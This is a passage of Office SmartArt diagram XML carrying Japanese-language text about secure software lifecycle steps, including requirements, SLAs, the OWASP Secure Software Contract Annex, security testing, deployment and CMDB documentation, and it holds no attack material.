            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4D15543-9061-424B-A848-0C92495995FD}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>計画と設計工程を含む、全ての技術要件の達成を評価する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7FD6253-75BA-8F4E-81A0-00394F202A8E}" type="parTrans" cxnId="{8E8AC2BF-68D7-E749-9587-9ED1ABEEB494}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72C434AB-64A1-A442-99E9-FBB1788602E1}" type="sibTrans" cxnId="{8E8AC2BF-68D7-E749-9587-9ED1ABEEB494}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{138F093A-810D-ED4D-AB36-569643B739DA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>設計、セキュリティ、サービスレベルアグリーメント（</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>SLA</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>）を含む技術的な要件を交渉する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1F6978F-D2EF-4B46-B75A-45BA33621292}" type="parTrans" cxnId="{3227372D-E906-6F4E-8E96-E9FA65313C8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0F4DC8B-0FAC-9449-A0AF-EFB661BC3BF3}" type="sibTrans" cxnId="{3227372D-E906-6F4E-8E96-E9FA65313C8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDBA71B7-7A44-A942-89D9-2255168FF8BF}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>のような様式やチェックリストを適用する。 </a:t>
          </a:r>
          <a:br>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>注記</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>: OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>は米国の契約法に基づいている。そのため、参照するに当たっては、弁護士に相談する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D43DB619-CCAA-0948-97BA-6C66133D9602}" type="parTrans" cxnId="{D9FA832D-F87A-CC48-BF9D-653E8F4764BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBBB261A-D567-BE4D-A68B-24D57CC2822E}" type="sibTrans" cxnId="{D9FA832D-F87A-CC48-BF9D-653E8F4764BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4140C0AF-BDDF-E842-B8DD-5AF6FC24A1D0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>保護の必要性と予想される脅威レベルに応じたセキュリティアーキテクチャ、制御及び対策を定義する。定義するに当たっては、セキュリティ専門家がサポートをするべきである。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D9146353-0639-104A-B930-D9CFF93C5F47}" type="parTrans" cxnId="{51683A2F-F3B4-F54E-9003-14C20EF93F40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73E70927-0144-D34B-A981-B32747975D24}" type="sibTrans" cxnId="{51683A2F-F3B4-F54E-9003-14C20EF93F40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C009CBD-2B17-1147-A961-BDEFF70BABFB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>アプリケーションオーナーが残存するリスクを受容するか、追加のリソースを提供する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{765D934A-CD95-1045-BDB4-FF8B9D684567}" type="parTrans" cxnId="{E670BDA0-F5C0-4941-B2E5-D3107FD0D7C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64F6CCFA-890C-694B-B00A-450AB409F105}" type="sibTrans" cxnId="{E670BDA0-F5C0-4941-B2E5-D3107FD0D7C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D733A7B8-564F-1A47-97EB-871D93ACEC21}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>各スプリントにおいて、非機能要件に対して追加された制約を含むセキュリティストーリーを作成する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2CA0D12-A4D9-F343-B30B-A8AF153B398F}" type="parTrans" cxnId="{6737DB18-8A7E-5743-9E9B-7A10AAEE99EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D7EC72F-0F4D-0343-9037-A6165C752ECF}" type="sibTrans" cxnId="{6737DB18-8A7E-5743-9E9B-7A10AAEE99EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F70C5CA4-4F9E-1B40-A4C5-2194A982C528}">
      <dgm:prSe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技術的な機能と</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>IT</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>アーキテクチャとの統合をテストし、ビジネステストを調整する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DD49A25-8B5C-C24A-8252-02B563B0C455}" type="parTrans" cxnId="{41001443-19D5-F640-93A3-FABF1912EF96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AA7A255-0C58-6347-9E7D-515C4676838C}" type="sibTrans" cxnId="{41001443-19D5-F640-93A3-FABF1912EF96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8885E6F-7407-C64B-B9DB-9FCA804A6604}">
      <dgm:prSe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技術的かつビジネス的な観点から、正常系と異常系のテストケースを作成する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3F633ED-F875-3B49-9611-1DAEFC39CCB5}" type="parTrans" cxnId="{23741E7C-0822-224E-8FBE-DAB4B56A41C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52CC0F03-1E45-3D44-90C8-7E4BC7F84C5D}" type="sibTrans" cxnId="{23741E7C-0822-224E-8FBE-DAB4B56A41C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D16F69F3-EE28-974D-8B99-CB2A1E2C39E9}">
      <dgm:prSe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アプリケーションによる内部プロセス、保護の必要性、想定される脅威レベルに応じて、セキュリティテストを管理する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65F16855-44ED-BD4A-A4A6-46DACBBE7C1F}" type="parTrans" cxnId="{33A9D48C-20A3-0249-B6AD-09BA6231F8B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0796F0DD-F2C0-914A-9420-BB1B76037FDA}" type="sibTrans" cxnId="{33A9D48C-20A3-0249-B6AD-09BA6231F8B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2FD8FEB-6768-1342-999F-979450856FFB}">
      <dgm:prSe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アプリケーションを起動し、適宜以前に使用していたアプリケーションからの移行する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07E11D50-C476-B749-ACDA-EFF21461F162}" type="parTrans" cxnId="{56CC6476-007B-7D44-A24F-434CD6DDC2F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8FC75C9C-5424-D645-8208-98D54C7794D8}" type="sibTrans" cxnId="{56CC6476-007B-7D44-A24F-434CD6DDC2F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECE7FE92-31BF-724C-A3FF-8657F774ACBF}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>構成管理データベース（</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>）やセキュリティアーキテクチャを含む、全ての文書を確定化する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F9AC828-FEE9-A04B-9539-DF07267AAF8C}" type="parTrans" cxnId="{18A47F6B-B710-4846-A1B5-A56DEDB5ED69}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FA4F62B-8C6F-AB4F-8CEB-90ED913764AC}" type="sibTrans" cxnId="{18A47F6B-B710-4846-A1B5-A56DEDB5ED69}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A69E44DB-6CF3-334E-9A1A-6F1467B4A6D7}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>利用者のセキュリティ意識を高め、セキュリティとユーザビリティのバランスを管理する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB933985-0A1C-DC41-93B4-9EDBC59874B1}" type="parTrans" cxnId="{5151C2B0-44C8-E44C-BD5C-05F56E667B40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DE332AE-6226-FB4A-A27B-A6629BF58831}" type="sibTrans" cxnId="{5151C2B0-44C8-E44C-BD5C-05F56E667B40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8724D14D-B668-9F4F-812A-290F764EE6C1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>例えばアプリケーションや</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>OS</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
